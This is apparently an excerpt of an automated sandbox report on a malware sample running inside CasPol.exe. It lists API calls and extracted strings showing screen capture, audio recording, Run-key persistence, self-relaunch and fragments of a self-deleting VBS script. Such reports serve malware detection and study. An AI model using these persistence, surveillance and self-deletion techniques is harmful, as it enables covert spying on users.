                                                                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                • Instruction Fuzzy Hash: 5B9154B310C0E349DB3D4639847403FFEF15A563A1B1A679FE4F2CA2C5EE288565D624
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction ID: eb820b35a2641912eb9ff5d16cdfa81a50ceb30e04b2f4d47c9798fb0fa66f46
                                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction Fuzzy Hash: 3491A7722090A31DDB2D4639843403FFFE15A563A1B1BA79FD4F2CB2C5ED28D964DA24
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 364cc13a289dc0ce81a78afd7db0cdc41a28cfc106a277fbe5b23d2174104350
                                                                                                • Instruction ID: 3cf18c0d826463afbe89e475a5c7b17f33369b7a6d620af3ef40d0ad4ead64e4
                                                                                                • Opcode Fuzzy Hash: 364cc13a289dc0ce81a78afd7db0cdc41a28cfc106a277fbe5b23d2174104350
                                                                                                • Instruction Fuzzy Hash: 10615771E0060867EE386968B856BBF23A4AF4DB18F14341BE843DB385D65DDD43835E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e08550926610149d2907a64cdab228bdd5846e9e2727ceec6c104fc9914690c2
                                                                                                • Instruction ID: b9fa1b0b40c6464c7c23e4f783a2c4cc8d7b3f542efc6a4ce67a7e3fa50c54dc
                                                                                                • Opcode Fuzzy Hash: e08550926610149d2907a64cdab228bdd5846e9e2727ceec6c104fc9914690c2
                                                                                                • Instruction Fuzzy Hash: 596136B1E0060896DB385A28B8967BF2398EB5D304F14351BEC83DB381D66DED46875F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction ID: 7b3a2e63247afe9edf549f88f25df29c5744deddbf3acd7c38ddff1b86da152b
                                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction Fuzzy Hash: A081C9B21090A31DDB2D423A853413FFFE15E553A1B1BA79FD4F2CA2C5EE28C564D624
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                • Instruction ID: cee5e8aa058cab72f47c1252862074b7a33edcf92ba99b8242ad85c8d79f7feb
                                                                                                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                • Instruction Fuzzy Hash: 6A51787160060857DB395A6885D67BF2B899B0E344F18742FE48BFB382C60DED12D39E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                • Instruction ID: a1764f4878c0090f3dddee11b9fa4dd44c6bcaf443cdbc9a7423fc55b8fdb92d
                                                                                                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                • Instruction Fuzzy Hash: 285138616407049BDB38856884DB7BF679A9B5E704F18390FE486F73C2C60DEE06875E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1c779f12f611b8dda6e5ae50ec22da61f8b8ae12354eff81384336edfcffc5bc
                                                                                                • Instruction ID: b54697577a8b4caa58ab057165119fb3c01a9d9d25aa48dfc33613f80cd324c0
                                                                                                • Opcode Fuzzy Hash: 1c779f12f611b8dda6e5ae50ec22da61f8b8ae12354eff81384336edfcffc5bc
                                                                                                • Instruction Fuzzy Hash: D2616D32A0C3059FC308DF75E581A5BB7E5BFCC718F910D1EF4899A151E634EA088B96
                                                                                                APIs
                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004181AF
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 004181BA
                                                                                                  • Part of subcall function 00418648: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418678
                                                                                                • CreateCompatibleBitmap.GDI32(?,00000000), ref: 0041823B
                                                                                                • DeleteDC.GDI32(?), ref: 00418253
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418256
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00418261
                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418289
                                                                                                • GetCursorInfo.USER32(?), ref: 004182AB
                                                                                                • GetIconInfo.USER32(?,?), ref: 004182C1
                                                                                                • DeleteObject.GDI32(?), ref: 004182F0
                                                                                                • DeleteObject.GDI32(?), ref: 004182FD
                                                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 0041830A
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00660046), ref: 0041833A
                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00418369
                                                                                                • LocalAlloc.KERNEL32(00000040,00000028), ref: 004183B2
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004183D5
                                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0041843E
                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00418461
                                                                                                • DeleteDC.GDI32(?), ref: 00418475
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418478
                                                                                                • DeleteObject.GDI32(00000000), ref: 0041847B
                                                                                                • GlobalFree.KERNEL32(00CC0020), ref: 00418486
                                                                                                • DeleteObject.GDI32(00000000), ref: 0041853A
                                                                                                • GlobalFree.KERNEL32(?), ref: 00418541
                                                                                                • DeleteDC.GDI32(?), ref: 00418551
                                                                                                • DeleteDC.GDI32(00000000), ref: 0041855C
                                                                                                • DeleteDC.GDI32(?), ref: 0041858E
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418591
                                                                                                • DeleteObject.GDI32(?), ref: 00418597
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                                • String ID: DISPLAY
                                                                                                • API String ID: 1352755160-865373369
                                                                                                • Opcode ID: 1dff81f0540764a89d2c7d7159e85f193f7e11ed09d31530588392d4586e04da
                                                                                                • Instruction ID: a1654617e6feb41a21483335bab58d6c80918fdf06c9fa75f2eb3c48c5790805
                                                                                                • Opcode Fuzzy Hash: 1dff81f0540764a89d2c7d7159e85f193f7e11ed09d31530588392d4586e04da
                                                                                                • Instruction Fuzzy Hash: EFC16C31504344AFD7209F21CC44BABBBE9EF88751F44482EF989A32A1DF34E945CB5A
                                                                                                APIs
                                                                                                  • Part of subcall function 00411771: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E748), ref: 00411781
                                                                                                  • Part of subcall function 00411771: WaitForSingleObject.KERNEL32(000000FF), ref: 00411794
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00475308,?,pth_unenc), ref: 0040C013
                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00475308,?,pth_unenc), ref: 0040C056
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00475308,?,pth_unenc), ref: 0040C065
                                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00475308,pth_unenc,0040BF26,004752F0,00475308,?,pth_unenc), ref: 0040AFC9
                                                                                                  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(00475108), ref: 0040AFD5
                                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                  • Part of subcall function 0041AD43: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466900,0040C07B,.vbs,?,?,?,?,?,00475308), ref: 0041AD6A
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466900,00466900,00000000), ref: 0040C280
                                                                                                • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                • String ID: SG$ SG$")$.vbs$On Error Resume Next$PSG$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                • API String ID: 3797177996-899740633
                                                                                                • Opcode ID: 2e08819100f43b44189e68cd7696385f95e235eb8b9486d699c823ffb0003bcf
                                                                                                • Instruction ID: 3970d62be7f9f5e1fdb580af11360c5c0218cddba346a3e39168d22276c4a34b
                                                                                                • Opcode Fuzzy Hash: 2e08819100f43b44189e68cd7696385f95e235eb8b9486d699c823ffb0003bcf
                                                                                                • Instruction Fuzzy Hash: 838194316042005BC315FB21D852AAF7799AF91708F10453FF986A72E2EF7C9D49C69E
                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00475308,?,00000000), ref: 004113AC
                                                                                                • ExitProcess.KERNEL32 ref: 004115F5
                                                                                                  • Part of subcall function 00412735: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475308), ref: 00412751
                                                                                                  • Part of subcall function 00412735: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041276A
                                                                                                  • Part of subcall function 00412735: RegCloseKey.KERNEL32(00000000), ref: 00412775
                                                                                                  • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 00411433
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,,@,?,?,?,?,00000000), ref: 00411442
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 0041144D
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411454
                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 0041145A
                                                                                                  • Part of subcall function 004128AD: RegCreateKeyA.ADVAPI32(80000001,00000000,TeF), ref: 004128BB
                                                                                                  • Part of subcall function 004128AD: RegSetValueExA.KERNEL32(TeF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128D6
                                                                                                  • Part of subcall function 004128AD: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128E1
                                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041148B
                                                                                                • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 004114E7
                                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411501
                                                                                                • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 00411513
                                                                                                  • Part of subcall function 0041B79A: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B7F6
                                                                                                  • Part of subcall function 0041B79A: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B80A
                                                                                                  • Part of subcall function 0041B79A: CloseHandle.KERNEL32(00000000), ref: 0041B817
                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041155B
                                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 0041159C
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004115B1
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004115BC
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004115C3
                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004115C9
                                                                                                  • Part of subcall function 0041B79A: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B7D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                • String ID: ,@$.exe$0TG$PSG$WDH$exepath$open$temp_
                                                                                                • API String ID: 4250697656-4136069298
                                                                                                • Opcode ID: 57a76233155c5e6f3f5eb151cd316bca093877b01aee461a5fef8088efcefce1
                                                                                                • Instruction ID: 17001e37a1d7cf9a3413e78a7a022695eb621cd558d1591dce66fb7483b9d66c
                                                                                                • Opcode Fuzzy Hash: 57a76233155c5e6f3f5eb151cd316bca093877b01aee461a5fef8088efcefce1
                                                                                                • Instruction Fuzzy Hash: 7551B571A00315BBDB00A7A09C46EFE736E9B44715F10416BF906B71E2EF788E858A9D
                                                                                                APIs
                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A4A8
                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A4BC
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00466554), ref: 0041A4E4
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041A4F5
                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A536
                                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A54E
                                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A563
                                                                                                • SetEvent.KERNEL32 ref: 0041A580
                                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A591
                                                                                                • CloseHandle.KERNEL32 ref: 0041A5A1
                                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A5C3
                                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A5CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                • API String ID: 738084811-2094122233
                                                                                                • Opcode ID: 6d4a6cd464b3278e48178108b4558c0e5a7ff5f6dd46a0fbf8ec062258ae21a7
                                                                                                • Instruction ID: 23b594f260307180257043fa1e2d6aa1707bafa700398656917524c484c431be
                                                                                                • Opcode Fuzzy Hash: 6d4a6cd464b3278e48178108b4558c0e5a7ff5f6dd46a0fbf8ec062258ae21a7
                                                                                                • Instruction Fuzzy Hash: A251B1716442046AD214BB32EC92EBF3B9DAB90758F10443FF445621E2EE789D48866F
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 0040BC75
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750FC,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,004750FC,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                • _wcslen.LIBCMT ref: 0040BD54
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                • _wcslen.LIBCMT ref: 0040BE34
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750FC,0000000E), ref: 0040BE9B
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466900,00466900,00000001), ref: 0040BEB9
                                                                                                • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                • String ID: SG$ SG$ SG$ SG$ SG$6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open
                                                                                                • API String ID: 1579085052-2643403765
                                                                                                • Opcode ID: b517d9bc3aa972765ce7c801ca7dc33223a078214a9d1acbeda1fcbeea04b810
                                                                                                • Instruction ID: cada26950b0f91ffbe9684419e497f708478a0192fdd3dd39558b78de3226dfb
                                                                                                • Opcode Fuzzy Hash: b517d9bc3aa972765ce7c801ca7dc33223a078214a9d1acbeda1fcbeea04b810
                                                                                                • Instruction Fuzzy Hash: 0B51C1316046006BD609B722EC52E7F77889F81719F50443FF985A62E2DF7CAD4582EE
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                • WriteFile.KERNEL32(00000000,00472B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                • WriteFile.KERNEL32(00000000,00472B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                • WriteFile.KERNEL32(00000000,00472B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Write$Create
                                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                                • API String ID: 1602526932-4212202414
                                                                                                • Opcode ID: d86e0a11b62900f44300c56c570c8f4c6d29e182ebfed168058ac3948617b838
                                                                                                • Instruction ID: 459023fa40bd80d73c97eac26e4027242e7445eca248bff5dcea5bec94493f3f
                                                                                                • Opcode Fuzzy Hash: d86e0a11b62900f44300c56c570c8f4c6d29e182ebfed168058ac3948617b838
                                                                                                • Instruction Fuzzy Hash: 85411C726443187AE210DE51DD86FBB7FACEB85B54F40081AF644E6080D7A5E909DBB3
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004752F0,00406933), ref: 004064F4
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                • API String ID: 1646373207-165202446
                                                                                                • Opcode ID: ef23c6471a2b46cbb5b12a679159521cca5d22753a6c35f36816646c352fbe50
                                                                                                • Instruction ID: d8392adca69ca7380431791802c09c3f057f20abbaf47be00649cb9a46baa942
                                                                                                • Opcode Fuzzy Hash: ef23c6471a2b46cbb5b12a679159521cca5d22753a6c35f36816646c352fbe50
